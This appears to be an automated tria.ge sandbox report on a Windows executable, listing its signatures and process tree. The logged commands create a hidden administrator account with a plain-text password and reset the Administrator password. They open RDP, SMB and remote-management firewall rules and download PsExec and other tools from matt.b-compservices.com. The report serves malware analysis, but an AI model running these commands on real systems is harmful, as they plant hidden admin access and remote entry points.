Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 09/09/2024, 21:32
Static task: static1
Behavioral task: behavioral1
  Sample: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
  Resource: win10v2004-20240802-en
General
Target: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe
Size: 1.2MB
MD5: 1a027bd2e0bd67f33bb6ad6f4029b1c6
SHA1: 763e46995b5401cb489a25c3b947000368911d4d
SHA256: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50
SHA512: d27761d31cca6c425e555f85f9e12b076ce62efca1756f15e65d3bf1013ca660ad47464b6785d10c815e2b82f8de953db6a45b98e079fa462b73ac613434849f
SSDEEP: 24576:XD7Xr5my0DPP23Iy5YAmRW6B8If0s83I4eqowSwa1X9tqY7Jxiq+n:XD7Xroy0DPP23Iy5YAmw6B8If0F3Iwo4
Malware Config
Signatures
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
- Set value (int) \REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request 12 IoCs

Command and Scripting Interpreter: PowerShell 17 IoCs

Disables taskbar notifications via registry modification

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 7 IoCs

Modifies WinLogon 2 TTPs 5 IoCs
- Key created \REGISTRY\MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)

Power Settings 1 TTPs 7 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Hide Artifacts: Hidden Users 1 TTPs 2 IoCs
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Billros = "0" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\Administrator = "0" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)

Drops file in Windows directory 13 IoCs
- File created C:\windows\whois.exe (process: powershell.exe)
- File created C:\windows\putty.exe (process: powershell.exe)
- File created C:\windows\Procmon.exe (process: powershell.exe)
- File created C:\windows\netscan.exe (process: powershell.exe)
- File created C:\windows\PsExec.exe (process: powershell.exe)
- File created C:\windows\winmtr.exe (process: powershell.exe)
- File created C:\windows\Fping.exe (process: powershell.exe)
- File created C:\windows\procexp.exe (process: powershell.exe)
- File created C:\windows\grep.exe (process: powershell.exe)
- File opened for modification C:\windows\resources\themes\BComp.theme (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- File created C:\windows\devcon.exe (process: powershell.exe)
- File created C:\windows\nircmd.exe (process: powershell.exe)
- File created C:\windows\TreeSizeFree.exe (process: powershell.exe)

Event Triggered Execution: Netsh Helper DLL 1 TTPs 24 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.

Modifies Internet Explorer settings 2 IoCs
- Key created \REGISTRY\MACHINE\software\microsoft\internet explorer\main (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL = "google.com" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)

Modifies Internet Explorer start page 1 TTPs 1 IoCs
- Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "google.com" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)

Modifies data under HKEY_USERS 32 IoCs
Runs net.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious use of AdjustPrivilegeToken 35 IoCs
Suspicious use of WriteProcessMemory 64 IoCs
System policy modification 1 TTPs 7 IoCs
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\HideSCAHealth = "1" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SoftwareSASGeneration = "3" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ = "0" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy = "1" (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)
- Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer (process: 2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe)

Processes
-
C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"C:\Users\Admin\AppData\Local\Temp\2cf0a5d81c398b1b9b3420cef774c5739fcc25812172a1be62b2c258d0dcfc50.exe"1⤵
- Modifies visibility of file extensions in Explorer
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies Internet Explorer start page
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3264 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes"2⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\system32\net.exenet user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes3⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add BillRos d3troittAlk4959toGetherabov31$9qu1tedark40able4$7Hugeloudchord /yes4⤵PID:900
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user billros /active"2⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\net.exenet user billros /active3⤵
- Suspicious use of WriteProcessMemory
PID:4692 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user billros /active4⤵PID:3588
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net localgroup administrators" /add billros2⤵
- Suspicious use of WriteProcessMemory
PID:3480 -
C:\Windows\system32\net.exenet localgroup administrators /add billros3⤵
- Suspicious use of WriteProcessMemory
PID:3184 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators /add billros4⤵PID:1636
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes"2⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\system32\net.exenet user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes3⤵
- Suspicious use of WriteProcessMemory
PID:4664 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator Root48wAve53pr0pertyintere$tk3epoh74ship58walkliquiddance64 /yes4⤵PID:2576
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "net user administrator /active"2⤵PID:392
-
C:\Windows\system32\net.exenet user administrator /active3⤵PID:3808
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator /active4⤵PID:5288
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -command set-localuser billros -passwordneverexpires $true"2⤵PID:1516
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command set-localuser billros -passwordneverexpires $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5364
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -command set-localuser administrator -passwordneverexpires $true"2⤵PID:3104
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command set-localuser administrator -passwordneverexpires $true3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5296
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh int tcp set global chimney=disabled rss=disabled netdma=disabled2⤵PID:64
-
C:\Windows\system32\netsh.exenetsh int tcp set global chimney=disabled rss=disabled netdma=disabled3⤵
- Event Triggered Execution: Netsh Helper DLL
PID:5272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall set icmp 8 enable2⤵PID:1476
-
C:\Windows\system32\netsh.exenetsh firewall set icmp 8 enable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6760
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any2⤵PID:224
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="ICMP Allow incoming V4 echo request" protocol=icmpv4:8,any dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any2⤵PID:1968
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="DWRCC" protocol=tcp localport=6129 dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6312
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any2⤵PID:4152
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name=Netlogon protocol=tcp localport=445 dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5924
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any2⤵PID:2252
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name=RDP protocol=tcp localport=3389 dir=in action=allow profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any2⤵PID:208
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh firewall set service type=remoteadmin enable profile=all2⤵PID:4544
-
C:\Windows\system32\netsh.exenetsh firewall set service type=remoteadmin enable profile=all3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:6744
-
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg -h off2⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4976
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg -x -hibernate-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg -x -hibernate-timeout-dc 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg -x -standby-timeout-ac 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2920
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg -x -standby-timeout-dc 152⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg -setacvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
C:\Windows\SYSTEM32\powercfg.exepowercfg -setdcvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 02⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:1072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command Get-AppxProvisionedPackage -online | where-object {$_.displayname -like "*OneNote*" -or $_.displayname -like "*bing*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*xbox*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*3DBuilder*" -or $_.displayname -like "*BingFinance*" -or $_.displayname -like "*BingNews*" -or $_.displayname -like "*BingSports*" -or $_.displayname -like "*ConnectivityStore*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*MicrosoftSolitaireCollection*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*Sway*" -or $_.displayname -like "*WindowsMaps*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*ZuneMusic*" -or $_.displayname -like "*ZuneVideo*" -or $_.displayname -like "*xbox*"} | remove-appxprovisionedpackage -online2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command Get-AppxPackage | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command Get-AppxPackage -allusers | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage -allusers2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 3528)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/devcon.exe -outfile C:\windows\devcon.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 3352)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Fping.exe -outfile C:\windows\Fping.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 4004)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/grep.exe -outfile C:\windows\grep.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 1840)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/netscan.exe -outfile C:\windows\netscan.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 3412)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/nircmd.exe -outfile C:\windows\nircmd.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 4708)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/procexp.exe -outfile C:\windows\procexp.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 1268)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Procmon.exe -outfile C:\windows\Procmon.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 3056)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/PsExec.exe -outfile C:\windows\PsExec.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 8)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/putty.exe -outfile C:\windows\putty.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 2136)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/TreeSizeFree.exe -outfile C:\windows\TreeSizeFree.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 5008)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/winmtr.exe -outfile C:\windows\winmtr.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (tree depth 2, PID 1408)
Command line: powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/whois.exe -outfile C:\windows\whois.exe
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe (tree depth 2, PID 4888)
Command line: C:\Windows\system32\cmd.exe /c reg load HKU\default C:\users\default\ntuser.dat
    C:\Windows\system32\reg.exe (tree depth 3, PID 6332)
    Command line: reg load HKU\default C:\users\default\ntuser.dat
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\cmd.exe (tree depth 2, PID 3632)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7028)
    Command line: reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 1636)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7060)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 3048)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7048)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 880)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 6960)
    Command line: reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 528)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 6972)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 4664)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 6164)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 1592)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7068)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 852)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7000)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 4356)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7084)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 2292)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 5516)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 4144)
Command line: C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
    C:\Windows\system32\reg.exe (tree depth 3, PID 7076)
    Command line: reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
    - Modifies data under HKEY_USERS

C:\Windows\system32\cmd.exe (tree depth 2, PID 1236)
